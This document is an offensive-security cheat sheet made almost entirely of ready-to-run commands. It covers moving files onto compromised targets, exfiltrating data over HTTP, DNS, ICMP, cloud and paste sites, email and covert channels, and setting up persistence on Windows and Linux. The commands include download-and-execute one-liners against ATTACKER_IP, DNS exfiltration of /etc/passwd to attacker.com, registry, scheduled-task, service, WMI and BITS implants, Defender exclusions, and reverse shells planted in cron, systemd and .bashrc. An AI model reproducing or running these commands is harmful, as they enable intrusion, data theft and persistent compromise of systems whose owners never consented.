General Offensive Techniques Part II
#File Transfer Techniques
#HTTP/HTTPS Transfer
## === PYTHON HTTP SERVERS ===
# Python 3 (most common)
python3 -m http.server 80
python3 -m http.server 8080 --bind 0.0.0.0
# Python 2 (legacy)
python2 -m SimpleHTTPServer 80
# Python with SSL/HTTPS
openssl req -new -x509 -keyout server.pem -out server.pem -days 365 -nodes
python3 -c "import http.server, ssl; server_address=('0.0.0.0', 443); httpd = http.server.HTTPServer(server_address, http.server.SimpleHTTPRequestHandler); httpd.socket = ssl.wrap_socket(httpd.socket, server_side=True, certfile='server.pem', ssl_version=ssl.PROTOCOL_TLS); httpd.serve_forever()"
# Python with authentication
python3 -m http.server 8080 --username user --password pass
# Updog (Python HTTP server with upload support)
pip3 install updog
updog -p 80
# === OTHER HTTP SERVERS ===
# PHP built-in server
php -S 0.0.0.0:80
# Ruby HTTP server
ruby -run -e httpd . -p 80
# Node.js HTTP server
npx http-server -p 80
# Busybox HTTP server
busybox httpd -f -p 80
# Apache/Nginx
sudo cp payload.exe /var/www/html/
sudo systemctl start apache2
sudo systemctl start nginx
# === WGET DOWNLOAD (TARGET) ===
# Basic download
wget http://ATTACKER_IP/file
wget http://ATTACKER_IP/file -O output_file
# Background download
wget http://ATTACKER_IP/file -q -O file &
# Download with authentication
wget --user=username --password=password http://ATTACKER_IP/file
# Download via proxy
wget -e use_proxy=yes -e http_proxy=proxy:port http://ATTACKER_IP/file
# Download and execute
wget http://ATTACKER_IP/script.sh -O /tmp/script.sh && bash /tmp/script.sh
# Recursive download
wget -r -np -nH --cut-dirs=1 http://ATTACKER_IP/directory/
# === CURL DOWNLOAD (TARGET) ===
# Basic download
curl http://ATTACKER_IP/file -o file
curl http://ATTACKER_IP/file -O # Keep original filename
# Download and execute
curl http://ATTACKER_IP/script.sh | bash
curl http://ATTACKER_IP/script.sh -o /tmp/script.sh && bash /tmp/script.sh
# Download via proxy
curl -x proxy:port http://ATTACKER_IP/file -o file
# Download with authentication
curl -u username:password http://ATTACKER_IP/file -o file
# Follow redirects
curl -L http://ATTACKER_IP/file -o file
# Silent download
curl -s http://ATTACKER_IP/file -o file
# === POWERSHELL DOWNLOAD (TARGET) ===
# Invoke-WebRequest
Invoke-WebRequest -Uri http://ATTACKER_IP/file.exe -OutFile file.exe
iwr http://ATTACKER_IP/file.exe -OutFile file.exe
# WebClient
(New-Object Net.WebClient).DownloadFile('http://ATTACKER_IP/file.exe','file.exe')
# DownloadString (execute in memory)
IEX(New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/script.ps1')
IEX(IWR http://ATTACKER_IP/script.ps1 -UseBasicParsing)
# With authentication
$cred = Get-Credential
Invoke-WebRequest -Uri http://ATTACKER_IP/file.exe -OutFile file.exe -Credential $cred
# Bypass SSL validation
[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true}
Invoke-WebRequest -Uri https://ATTACKER_IP/file.exe -OutFile file.exe
# === LINUX /DEV/TCP METHOD ===
# Download via /dev/tcp
exec 3<>/dev/tcp/ATTACKER_IP/80
echo -e "GET /file.txt HTTP/1.0\r\n\r\n" >&3
cat <&3 > file.txt
# === FETCH (BSD/FREEBSD) ===
fetch http://ATTACKER_IP/file
fetch http://ATTACKER_IP/file -o output_file
# === TELNET DOWNLOAD ===
# Download via telnet
telnet ATTACKER_IP 80
GET /file.txt HTTP/1.0
# Save output
SMB Transfer
## === IMPACKET SMB SERVER ===
# Basic SMB server (anonymous)
impacket-smbserver share $(pwd) -smb2support
# SMB with authentication
impacket-smbserver share $(pwd) -smb2support -username user -password pass
# Specific directory
impacket-smbserver share /path/to/files -smb2support
# Read-only share
impacket-smbserver share $(pwd) -smb2support -readonly
# === SAMBA (LINUX) ===
# Install Samba
sudo apt-get install samba
# Configure share
cat >> /etc/samba/smb.conf << 'EOF'
[share]
path = /tmp/share
browseable = yes
read only = no
guest ok = yes
EOF
# Restart Samba
sudo systemctl restart smbd
# === ACCESS FROM WINDOWS ===
# List shares
net view \\ATTACKER_IP
# Map drive
net use Z: \\ATTACKER_IP\share
net use Z: \\ATTACKER_IP\share /user:user pass
# Copy files
copy \\ATTACKER_IP\share\file.exe .
xcopy \\ATTACKER_IP\share\* C:\Temp\ /s /e
# Execute directly from share
\\ATTACKER_IP\share\payload.exe
# PowerShell copy
Copy-Item -Path \\ATTACKER_IP\share\file.exe -Destination C:\Temp\
# === ACCESS FROM LINUX ===
# List shares
smbclient -L //ATTACKER_IP -N
# Connect to share
smbclient //ATTACKER_IP/share -N
smbclient //ATTACKER_IP/share -U user%password
# Download file
smbclient //ATTACKER_IP/share -N -c "get file.exe"
# Mount SMB share
sudo mkdir /mnt/smb
sudo mount -t cifs //ATTACKER_IP/share /mnt/smb -o guest
sudo mount -t cifs //ATTACKER_IP/share /mnt/smb -o username=user,password=pass
# Copy files
cp /mnt/smb/file.exe /tmp/
FTP Transfer
## === PYTHON FTP SERVER ===
# pyftpdlib (easiest)
sudo python3 -m pyftpdlib -p 21 -w -u user -P pass
# Anonymous FTP
sudo python3 -m pyftpdlib -p 21 -w
# Specific directory
sudo python3 -m pyftpdlib -p 21 -w -d /path/to/files
# === PURE-FTPD ===
# Install
sudo apt-get install pure-ftpd
# Create user
sudo groupadd ftpgroup
sudo useradd -g ftpgroup -d /dev/null -s /etc ftpuser
sudo pure-pw useradd user -u ftpuser -d /tmp/
sudo pure-pw mkdb
# Start server
sudo pure-ftpd -j -A
# === VSFTPD ===
# Install
sudo apt-get install vsftpd
# Configure anonymous access
sudo sed -i 's/anonymous_enable=NO/anonymous_enable=YES/' /etc/vsftpd.conf
sudo sed -i 's/#write_enable=YES/write_enable=YES/' /etc/vsftpd.conf
# Restart
sudo systemctl restart vsftpd
# === FTP CLIENT TRANSFER ===
# Interactive FTP
ftp ATTACKER_IP
# ftp> binary
# ftp> get file.exe
# ftp> put local_file.txt
# Script-based FTP (Windows)
echo open ATTACKER_IP > ftp.txt
echo user username >> ftp.txt
echo password >> ftp.txt
echo binary >> ftp.txt
echo get file.exe >> ftp.txt
echo bye >> ftp.txt
ftp -s:ftp.txt
# One-liner FTP download (Linux)
wget ftp://ATTACKER_IP/file.exe --ftp-user=user --ftp-password=pass
# cURL FTP
curl ftp://ATTACKER_IP/file.exe -o file.exe
curl -u user:pass ftp://ATTACKER_IP/file.exe -o file.exe
# PowerShell FTP
$client = New-Object System.Net.WebClient
$client.Credentials = New-Object System.Net.NetworkCredential("user","pass")
$client.DownloadFile("ftp://ATTACKER_IP/file.exe", "file.exe")
SCP/SFTP Transfer
## === SCP TRANSFER ===
# Upload to target
scp file.exe user@TARGET_IP:/tmp/
scp -i key.pem file.exe user@TARGET_IP:/tmp/
# Download from target
scp user@TARGET_IP:/path/to/file.txt .
scp -i key.pem user@TARGET_IP:/path/to/file.txt .
# Recursive copy
scp -r directory/ user@TARGET_IP:/tmp/
# Through jump host
scp -o ProxyJump=jumphost file.exe user@TARGET_IP:/tmp/
# === SFTP TRANSFER ===
# Interactive SFTP
sftp user@TARGET_IP
# sftp> put file.exe
# sftp> get remote_file.txt
# Batch SFTP
sftp user@TARGET_IP << 'EOF'
put file.exe
get remote_file.txt
EOF
# === RSYNC TRANSFER ===
# Basic rsync over SSH
rsync -avz file.exe user@TARGET_IP:/tmp/
rsync -avz -e "ssh -i key.pem" file.exe user@TARGET_IP:/tmp/
# Rsync directory
rsync -avz directory/ user@TARGET_IP:/tmp/directory/
# Rsync with progress
rsync -avz --progress file.exe user@TARGET_IP:/tmp/
Base64 Transfer
## === ENCODE ON SOURCE ===
# Linux encode
base64 file.exe > file.b64
base64 -w 0 file.exe > file.b64 # No line wrapping
# Windows encode (PowerShell)
[Convert]::ToBase64String([IO.File]::ReadAllBytes("file.exe")) > file.b64
# Windows encode (certutil)
certutil -encode file.exe file.b64
# === DECODE ON TARGET ===
# Linux decode
base64 -d file.b64 > file.exe
# Windows decode (PowerShell)
[IO.File]::WriteAllBytes("file.exe", [Convert]::FromBase64String((Get-Content file.b64)))
# Windows decode (certutil)
certutil -decode file.b64 file.exe
# === COPY/PASTE TRANSFER ===
# Small files via terminal
cat file.b64
# Copy output, paste on target
echo "BASE64_STRING" | base64 -d > file.exe
# PowerShell
$b64 = "BASE64_STRING"
[IO.File]::WriteAllBytes("file.exe", [Convert]::FromBase64String($b64))
# === HEX TRANSFER ===
# Encode to hex
xxd -p file.exe | tr -d '\n' > file.hex
# Decode from hex
xxd -r -p file.hex > file.exe
# PowerShell hex decode
$hex = Get-Content file.hex
$bytes = [byte[]]::new($hex.Length / 2)
For($i=0; $i -lt $hex.Length; $i+=2) {
$bytes[$i/2] = [Convert]::ToByte($hex.Substring($i, 2), 16)
}
[IO.File]::WriteAllBytes("file.exe", $bytes)
DNS Exfiltration
## === DNSCAT2 ===
# Server (attacker)
dnscat2-server domain.com --secret=password
# Client (target)
./dnscat domain.com --secret=password
# Windows client
.\dnscat2.exe domain.com --secret=password
# === DNS EXFIL WITH NSLOOKUP ===
# Exfiltrate file via DNS queries
cat /etc/passwd | base64 | fold -w 63 | while read line; do
nslookup $line.attacker.com 8.8.8.8
done
# Windows PowerShell DNS exfil
$data = [Convert]::ToBase64String([IO.File]::ReadAllBytes("file.txt"))
$chunks = $data -split '(.{63})' | Where-Object {$_}
foreach($chunk in $chunks) {
Resolve-DnsName "$chunk.attacker.com"
}
# === DNS TRANSFER WITH DIG ===
# Send data via TXT queries
for i in $(cat file.txt | base64 | tr -d '\n' | fold -w63); do
dig +short TXT $i.attacker.com @8.8.8.8
done
# === IODINE DNS TUNNEL ===
# Server
sudo iodined -f -c -P password 10.0.0.1 tunnel.attacker.com
# Client
sudo iodine -f -P password tunnel.attacker.com
# Transfer files through tunnel
scp -o ProxyCommand="nc -X connect -x 127.0.0.1:1080 %h %p" file.txt user@10.0.0.1:/tmp/
# === DNS2TCP ===
# Server config
cat > dns2tcpd.conf << 'EOF'
listen = 0.0.0.0
port = 53
domain = tunnel.attacker.com
resources = ssh:127.0.0.1:22
EOF
dns2tcpd -f dns2tcpd.conf
# Client
dns2tcpc -r ssh -z tunnel.attacker.com -l 2222
scp -P 2222 file.txt user@localhost:/tmp/
ICMP Exfiltration
## === ICMPTUNNEL ===
# Server (attacker)
sudo ./icmptunnel -s
# Client (target)
sudo ./icmptunnel ATTACKER_IP
# Transfer files
scp file.txt user@ATTACKER_IP:/tmp/
# === PTUNNEL ===
# Server
sudo ptunnel -x password
# Client (tunnel SSH through ICMP)
sudo ptunnel -p ATTACKER_IP -lp 8000 -da ATTACKER_IP -dp 22 -x password
# Transfer via tunnel
scp -P 8000 file.txt user@localhost:/tmp/
# === PING EXFILTRATION ===
# Exfiltrate in ICMP payload
for i in $(cat file.txt | xxd -p -c 16); do
ping -c 1 -p $i ATTACKER_IP
done
# === ICMPSH ===
# Disable ICMP replies on attacker
sudo sysctl -w net.ipv4.icmp_echo_ignore_all=1
# Run server
sudo python icmpsh_m.py ATTACKER_IP TARGET_IP
# Run client on target
./icmpsh.exe -t ATTACKER_IP
Cloud Storage Transfer
## === AWS S3 ===
# Upload to S3
aws s3 cp file.txt s3://bucket-name/
aws s3 sync /local/dir s3://bucket-name/
# Download from S3
aws s3 cp s3://bucket-name/file.txt .
aws s3 sync s3://bucket-name/ /local/dir
# Public S3 bucket (no auth)
wget https://bucket-name.s3.amazonaws.com/file.txt
curl https://bucket-name.s3.amazonaws.com/file.txt -o file.txt
# === GOOGLE DRIVE ===
# Upload with gdrive
gdrive upload file.txt
# Upload with rclone
rclone copy file.txt gdrive:/folder/
# Download with wget (public link)
wget --no-check-certificate 'https://docs.google.com/uc?export=download&id=FILE_ID' -O file.txt
# === DROPBOX ===
# Upload with curl
curl -X POST https://content.dropboxapi.com/2/files/upload \
--header "Authorization: Bearer ACCESS_TOKEN" \
--header "Dropbox-API-Arg: {\"path\": \"/file.txt\"}" \
--header "Content-Type: application/octet-stream" \
--data-binary @file.txt
# Download with wget (public link)
wget https://www.dropbox.com/s/SHARE_ID/file.txt?dl=1 -O file.txt
# === ONEDRIVE ===
# Upload with rclone
rclone copy file.txt onedrive:/folder/
# === PASTEBIN / PASTE SITES ===
# Upload to pastebin
curl -X POST https://pastebin.com/api/api_post.php \
-d "api_dev_key=YOUR_API_KEY" \
-d "api_option=paste" \
-d "api_paste_code=$(cat file.txt)" \
-d "api_paste_name=file.txt"
# Upload to ix.io
cat file.txt | curl -F 'f:1=<-' ix.io
# Upload to termbin.com
cat file.txt | nc termbin.com 9999
# Upload to 0x0.st
curl -F 'file=@file.txt' https://0x0.st
# === TRANSFER.SH ===
# Upload
curl --upload-file file.txt https://transfer.sh/file.txt
# Download
wget https://transfer.sh/xxxxx/file.txt
Covert Channels
## === HTTP HEADERS ===
# Exfiltrate in User-Agent
data=$(cat file.txt | base64 | tr -d '\n')
curl -A "$data" http://ATTACKER_IP/
# Exfiltrate in Cookie
curl -H "Cookie: data=$data" http://ATTACKER_IP/
# === WEBSOCKET ===
# Exfiltrate via WebSocket
python3 << 'EOF'
import websocket
import base64
ws = websocket.WebSocket()
ws.connect("ws://ATTACKER_IP:8080")
with open('file.txt', 'rb') as f:
data = base64.b64encode(f.read()).decode()
ws.send(data)
ws.close()
EOF
# === STEGANOGRAPHY ===
# Hide data in image
steghide embed -cf image.jpg -ef secret.txt -p password
scp image.jpg user@ATTACKER_IP:/tmp/
# Extract on attacker
steghide extract -sf image.jpg -p password
# LSB steganography
python3 lsb.py encode image.png secret.txt output.png
# === TWITTER/SOCIAL MEDIA ===
# Exfiltrate via tweets (requires API)
python3 << 'EOF'
import tweepy
auth = tweepy.OAuthHandler(API_KEY, API_SECRET)
auth.set_access_token(ACCESS_TOKEN, ACCESS_SECRET)
api = tweepy.API(auth)
with open('file.txt', 'r') as f:
data = f.read()
api.update_status(data[:280])
EOF
# === EMAIL EXFILTRATION ===
# Send file via email
echo "Exfiltrated data" | mail -s "Data" -A file.txt attacker@email.com
# PowerShell email
Send-MailMessage -From "user@company.com" -To "attacker@email.com" -Subject "Data" -Body "See attachment" -Attachment
Persistence Techniques
#Windows Registry Persistence
## === RUN KEYS (USER LEVEL) ===
# Current user startup
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsUpdate" /t REG_SZ /d "C:\Users\Public\payload.exe" /f
# PowerShell payload in Run key
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "powershell -w hidden -enc BASE64_PAYLOAD" /f
# Current user Run (alternative path)
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityUpdate" /t REG_SZ /d "cmd /c start /b C:\Temp\payload.exe" /f
# === RUN KEYS (SYSTEM LEVEL - REQUIRES ADMIN) ===
# All users startup
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /t REG_SZ /d "C:\Windows\System32\payload.exe" /f
# All users (Wow6432Node for 32-bit apps on 64-bit systems)
reg add "HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run" /v "Update" /t REG_SZ /d "C:\Program Files (x86)\payload.exe" /f
# === RUNONCE KEYS ===
# Execute once then remove
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "Install" /t REG_SZ /d "C:\Temp\payload.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce" /v "Install" /t REG_SZ /d "C:\Temp\payload.exe" /f
# RunOnceEx (multiple commands)
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001" /v "Update" /t REG_SZ /d "C:\Temp\payload.exe" /f
# === EXPLORER RUN ===
# Less monitored than standard Run keys
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "Update" /t REG_SZ /d "C:\Users\Public\payload.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run" /v "Update" /t REG_SZ /d "C:\Windows\payload.exe" /f
# === WINLOGON KEYS ===
# Shell - runs at logon
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "explorer.exe,C:\Windows\System32\payload.exe" /f
# Userinit - runs before user desktop loads
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Userinit" /t REG_SZ /d "C:\Windows\system32\userinit.exe,C:\Windows\System32\payload.exe" /f
# === STARTUP APPROVED ===
# Bypass startup approved restrictions
reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Update" /t REG_BINARY /d "020000000000000000000000" /f
# === SERVICES REGISTRY ===
# Create service via registry
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MaliciousService" /v "ImagePath" /t REG_EXPAND_SZ /d "C:\Windows\System32\payload.exe" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MaliciousService" /v "DisplayName" /t REG_SZ /d "Windows Update Service" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MaliciousService" /v "Start" /t REG_DWORD /d 2 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MaliciousService" /v "Type" /t REG_DWORD /d 16 /f
# === IMAGE FILE EXECUTION OPTIONS (IFEO) ===
# Debugger hijacking
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v "Debugger" /t REG_SZ /d "C:\Windows\System32\payload.exe" /f
# GlobalFlag + silent process exit
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v "GlobalFlag" /t REG_DWORD /d 512 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" /v "ReportingMode" /t REG_DWORD /d 2 /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" /v "MonitorProcess" /t REG_SZ /d "C:\Windows\System32\payload.exe" /f
# === ACTIVE SETUP ===
# Runs once per user on login
reg add "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{RANDOM-GUID}" /v "StubPath" /t REG_SZ /d "C:\Windows\System32\payload.exe" /f
reg add "HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\{RANDOM-GUID}" /v "Version" /t REG_SZ /d "1" /f
# === SCREENSAVER ===
# Hijack screensaver
reg add "HKCU\Control Panel\Desktop" /v ScreenSaveActive /t REG_SZ /d 1 /f
reg add "HKCU\Control Panel\Desktop" /v ScreenSaveTimeOut /t REG_SZ /d 300 /f
reg add "HKCU\Control Panel\Desktop" /v SCRNSAVE.EXE /t REG_SZ /d "C:\Windows\System32\payload.scr" /f
# === BITS JOBS ===
# Create persistent BITS job
bitsadmin /create BackgroundUpdate
bitsadmin /addfile BackgroundUpdate http://ATTACKER_IP/payload.exe C:\Windows\Temp\payload.exe
bitsadmin /SetNotifyCmdLine BackgroundUpdate C:\Windows\Temp\payload.exe NULL
bitsadmin /SetMinRetryDelay BackgroundUpdate 60
bitsadmin /resume BackgroundUpdate
# PowerShell BITS job
Import-Module BitsTransfer
$job = Start-BitsTransfer -Source http://ATTACKER_IP/payload.exe -Destination C:\Temp\payload.exe -Asynchronous
$job | Set-BitsTransfer -NotifyCmdLine "C:\Temp\payload.exe" -NotifyFlags Transferred
# === PRINT MONITORS ===
# Runs as SYSTEM, loads DLL into spoolsv.exe
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\MyMonitor" /v "Driver" /t REG_SZ /d "evil.dll" /f
# === PORT MONITORS ===
reg add "HKLM\SYSTEM\CurrentControlSet\Control\Print\Monitors\PortMonitor" /v "Driver" /t REG_SZ /d "C:\Windows\System32\evil.dll" /f
# === TIME PROVIDERS ===
# W32Time providers
reg add "HKLM\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\EvilTime" /v "Enabled" /t REG_DWORD /d 1 /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\EvilTime" /v "DllName" /t REG_SZ /d "C:\Windows\System32\evil.dll" /f
Windows Scheduled Tasks
## === BASIC SCHEDULED TASKS ===
# Run at user logon
schtasks /create /tn "WindowsUpdate" /tr "C:\Windows\System32\payload.exe" /sc onlogon /ru SYSTEM /f
# Run every 5 minutes
schtasks /create /tn "SystemMonitor" /tr "C:\Windows\System32\payload.exe" /sc minute /mo 5 /ru SYSTEM /f
# Run daily at specific time
schtasks /create /tn "BackgroundUpdate" /tr "C:\Windows\System32\payload.exe" /sc daily /st 12:00 /ru SYSTEM /f
# Run at system startup
schtasks /create /tn "StartupTask" /tr "C:\Windows\System32\payload.exe" /sc onstart /ru SYSTEM /f
# Run on idle
schtasks /create /tn "IdleTask" /tr "C:\Windows\System32\payload.exe" /sc onidle /i 10 /f
# === HIDDEN SCHEDULED TASKS ===
# Task in Microsoft tree (harder to spot)
schtasks /create /tn "\Microsoft\Windows\UpdateOrchestrator\SystemUpdate" /tr "C:\Windows\System32\payload.exe" /sc daily /st 12:00 /ru SYSTEM /f
# Task with no visible trigger (SD descriptor)
$action = New-ScheduledTaskAction -Execute "C:\Windows\System32\payload.exe"
$trigger = New-ScheduledTaskTrigger -AtLogon
$principal = New-ScheduledTaskPrincipal -UserId "SYSTEM" -RunLevel Highest
$settings = New-ScheduledTaskSettingsSet -Hidden
Register-ScheduledTask -TaskName "BackgroundService" -Action $action -Trigger $trigger -Principal $principal -Settings $settings
# === POWERSHELL SCHEDULED TASKS ===
# Multiple triggers
$action = New-ScheduledTaskAction -Execute "powershell.exe" -Argument "-w hidden -enc BASE64_PAYLOAD"
$trigger1 = New-ScheduledTaskTrigger -AtLogon
$trigger2 = New-ScheduledTaskTrigger -AtStartup
$principal = New-ScheduledTaskPrincipal -UserId "NT AUTHORITY\SYSTEM" -LogonType ServiceAccount -RunLevel Highest
Register-ScheduledTask -TaskName "SystemService" -Action $action -Trigger $trigger1,$trigger2 -Principal $principal
# Task with specific user context
$action = New-ScheduledTaskAction -Execute "C:\Users\Public\payload.exe"
$trigger = New-ScheduledTaskTrigger -Daily -At 12:00PM
$principal = New-ScheduledTaskPrincipal -UserId "username" -RunLevel Highest
Register-ScheduledTask -TaskName "UserTask" -Action $action -Trigger $trigger -Principal $principal
# === TASK MODIFICATION ===
# Modify existing legitimate task
schtasks /change /tn "\Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /tr "C:\Windows\System32\payload.exe" /f
# Export task, modify XML, import
schtasks /query /tn "TaskName" /xml > task.xml
# Edit task.xml to add malicious action
schtasks /create /tn "ModifiedTask" /xml task.xml /f
# === COM HANDLER HIJACKING IN TASKS ===
# Create task with COM handler
$action = New-ScheduledTaskAction -Execute "C:\Windows\System32\cmd.exe" -Argument "/c C:\Windows\System32\payload.exe"
$trigger = New-ScheduledTaskTrigger -AtLogon
$settings = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -StartWhenAvailable
Register-ScheduledTask -TaskName "COMTask" -Action $action -Trigger $trigger -Settings $settings
Windows Services
## === CREATE NEW SERVICE ===
# Basic service creation
sc create "WindowsUpdateService" binpath= "C:\Windows\System32\payload.exe" start= auto
sc description "WindowsUpdateService" "Manages Windows update processes"
sc start "WindowsUpdateService"
# Service with delayed start (less suspicious)
sc create "SecurityUpdateService" binpath= "C:\Windows\System32\payload.exe" start= delayed-auto DisplayName= "Windows Security Update Service"
# Service with dependencies
sc create "NetworkMonitor" binpath= "C:\Windows\System32\svchost.exe -k NetworkService" start= auto depend= "Tcpip/Afd"
# === MODIFY EXISTING SERVICE ===
# Change service binary path
sc config "wuauserv" binpath= "C:\Windows\System32\payload.exe"
sc config "Spooler" binpath= "cmd /c start /b C:\Windows\System32\payload.exe"
# Service failure actions (restart on failure)
sc failure "WindowsUpdateService" reset= 86400 actions= restart/60000/restart/60000/restart/60000
# === SVCHOST HOSTING ===
# Add service to svchost group
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost" /v "netsvcs" /t REG_MULTI_SZ /d "netsvcs\0MaliciousService" /f
sc create "MaliciousService" binpath= "%SystemRoot%\System32\svchost.exe -k netsvcs" type= share start= auto
# === SERVICE DLL HIJACKING ===
# Create service pointing to malicious DLL
reg add "HKLM\SYSTEM\CurrentControlSet\Services\MaliciousService\Parameters" /v "ServiceDll" /t REG_EXPAND_SZ /d "C:\Windows\System32\evil.dll" /f
# === WINDOWS DEFENDER EXCLUSION ===
# Add service binary to exclusions
Add-MpPreference -ExclusionPath "C:\Windows\System32\payload.exe"
Add-MpPreference -ExclusionProcess "payload.exe"
WMI Persistence
## === WMI EVENT SUBSCRIPTION ===
# Event filter (trigger)
$FilterArgs = @{
Name = "SystemBootFilter"
EventNamespace = "root\cimv2"
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 200 AND TargetInstance.SystemUpTime < 320"
QueryLanguage = "WQL"
}
$Filter = Set-WmiInstance -Namespace root\subscription -Class __EventFilter -Arguments $FilterArgs
# Event consumer (action)
$ConsumerArgs = @{
Name = "SystemBootConsumer"
CommandLineTemplate = "powershell.exe -w hidden -enc BASE64_PAYLOAD"
}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class CommandLineEventConsumer -Arguments $ConsumerArgs
# Bind filter to consumer
$BindingArgs = @{
Filter = $Filter
Consumer = $Consumer
}
$Binding = Set-WmiInstance -Namespace root\subscription -Class __FilterToConsumerBinding -Arguments $BindingArgs
# === TIME-BASED WMI TRIGGER ===
# Trigger at specific time
$Query = "SELECT * FROM __InstanceModificationEvent WITHIN 600 WHERE TargetInstance ISA 'Win32_LocalTime' AND (TargetInstance.Hour = 12 AND TargetInstance.Minute = 0)"
$Filter = Set-WmiInstance -Class __EventFilter -Namespace root\subscription -Arguments @{
Name="TimeBasedFilter"
EventNamespace="root\cimv2"
QueryLanguage="WQL"
Query=$Query
}
$Consumer = Set-WmiInstance -Class CommandLineEventConsumer -Namespace root\subscription -Arguments @{
Name="TimeBasedConsumer"
CommandLineTemplate="C:\Windows\System32\payload.exe"
}
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace root\subscription -Arguments @{
Filter=$Filter
Consumer=$Consumer
}
# === ACTIVE SCRIPT EVENT CONSUMER ===
# VBScript consumer
$ConsumerArgs = @{
Name = "ScriptConsumer"
ScriptingEngine = "VBScript"
ScriptText = 'Set objShell = CreateObject("WScript.Shell"):objShell.Run "C:\Windows\System32\payload.exe",0,False'
}
$Consumer = Set-WmiInstance -Namespace root\subscription -Class ActiveScriptEventConsumer -Arguments $ConsumerArgs
# === LIST WMI PERSISTENCE ===
# List all event filters
Get-WMIObject -Namespace root\Subscription -Class __EventFilter
# List all consumers
Get-WMIObject -Namespace root\Subscription -Class __EventConsumer
# List all bindings
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding
# === REMOVE WMI PERSISTENCE ===
# Remove by name
Get-WMIObject -Namespace root\Subscription -Class __EventFilter -Filter "Name='SystemBootFilter'" | Remove-WmiObject
Get-WMIObject -Namespace root\Subscription -Class CommandLineEventConsumer -Filter "Name='SystemBootConsumer'" | Remove-WmiObject
Get-WMIObject -Namespace root\Subscription -Class __FilterToConsumerBinding | Where-Object {$_.Filter -match "SystemBootFilter"} | Remove-WmiObject
Linux Persistence
## === CRON JOBS ===
# User crontab
(crontab -l 2>/dev/null; echo "*/10 * * * * /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'") | crontab -
# System-wide cron
echo "*/10 * * * * root /bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'" | sudo tee -a /etc/crontab
# Cron directory files
echo "#!/bin/bash\nbash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1" | sudo tee /etc/cron.hourly/update
sudo chmod +x /etc/cron.hourly/update
# Anacron (runs on missed schedules)
echo "1 5 cron.daily /bin/bash /tmp/payload.sh" | sudo tee -a /etc/anacrontab
# === SYSTEMD SERVICES ===
# Create malicious service
sudo tee /etc/systemd/system/update.service << 'EOF'
[Unit]
Description=System Update Service
After=network.target
[Service]
Type=simple
ExecStart=/bin/bash -c 'while true; do bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1; sleep 300; done'
Restart=always
RestartSec=10
StandardOutput=null
StandardError=null
[Install]
WantedBy=multi-user.target
EOF
sudo systemctl daemon-reload
sudo systemctl enable update.service
sudo systemctl start update.service
# User-level service (no root required)
mkdir -p ~/.config/systemd/user/
tee ~/.config/systemd/user/background.service << 'EOF'
[Unit]
Description=Background Service
[Service]
Type=simple
ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'
Restart=always
[Install]
WantedBy=default.target
EOF
systemctl --user daemon-reload
systemctl --user enable background.service
systemctl --user start background.service
# === SYSTEMD TIMERS ===
# Service file
sudo tee /etc/systemd/system/backup.service << 'EOF'
[Unit]
Description=Backup Service
[Service]
Type=oneshot
ExecStart=/bin/bash /tmp/payload.sh
EOF
# Timer file
sudo tee /etc/systemd/system/backup.timer << 'EOF'
[Unit]
Description=Backup Timer
[Timer]
OnBootSec=5min
OnUnitActiveSec=30min
[Install]
WantedBy=timers.target
EOF
sudo systemctl enable backup.timer
sudo systemctl start backup.timer
# === RC.LOCAL (LEGACY) ===
# Add to rc.local
echo "/bin/bash /tmp/payload.sh &" | sudo tee -a /etc/rc.local
sudo chmod +x /etc/rc.local
# === BASHRC/PROFILE ===
# User bashrc
echo 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1 &' >> ~/.bashrc
